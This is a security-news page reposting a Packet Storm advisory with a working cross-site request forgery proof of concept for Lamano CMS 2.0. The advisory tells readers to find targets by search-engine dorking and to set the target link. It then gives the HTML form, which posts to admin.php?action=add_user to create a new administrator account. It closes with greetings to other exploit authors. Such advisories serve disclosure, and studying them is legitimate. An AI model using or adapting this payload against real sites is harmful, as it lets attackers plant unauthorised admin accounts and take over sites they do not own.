Security
Headlines
HeadlinesLatestCVEs

Headline

Lamano CMS 2.0 Cross Site Request Forgery

Lamano CMS version 2.0 suffers from a cross site request forgery vulnerability.

Packet Storm
Open in Source
#csrf#vulnerability#windows#google#php#auth#firefox

====================================================================================================================================
| # Title : Lamano CMS v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : http://www.lamano.lu/ |
| # Dork : © 2018 Lamano by easysolutions |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 8.

[+] Set the target site link Save changes and apply .

[+] infected file : admin.php

[+] http://127.0.0.1/q73/admin.php .

[+] save code as poc.html .

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">

</tr>
</table>
<br/><br/>
<form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST">
<table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">
<tr>
<td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>
</tr>
<tr>
<td class="tah11" align="right">Nom d’utilisateur :</td>
<td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>
</tr>
<tr>
<td class="tah11" align="right">Mot de passe : </td>
<td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>
</tr>
<tr>
<td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>
</tr>
</table>
</form><br/><br/>
<div>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 9aylasdjroot.dzLiquidWormHussin-X*D4NB4R *ViRuS_Ra3cH yasMouh CraCkEr |
=======================================================================================================================================

Packet Storm: Latest News

WordPress Really Simple Security Authentication Bypass
Packet Storm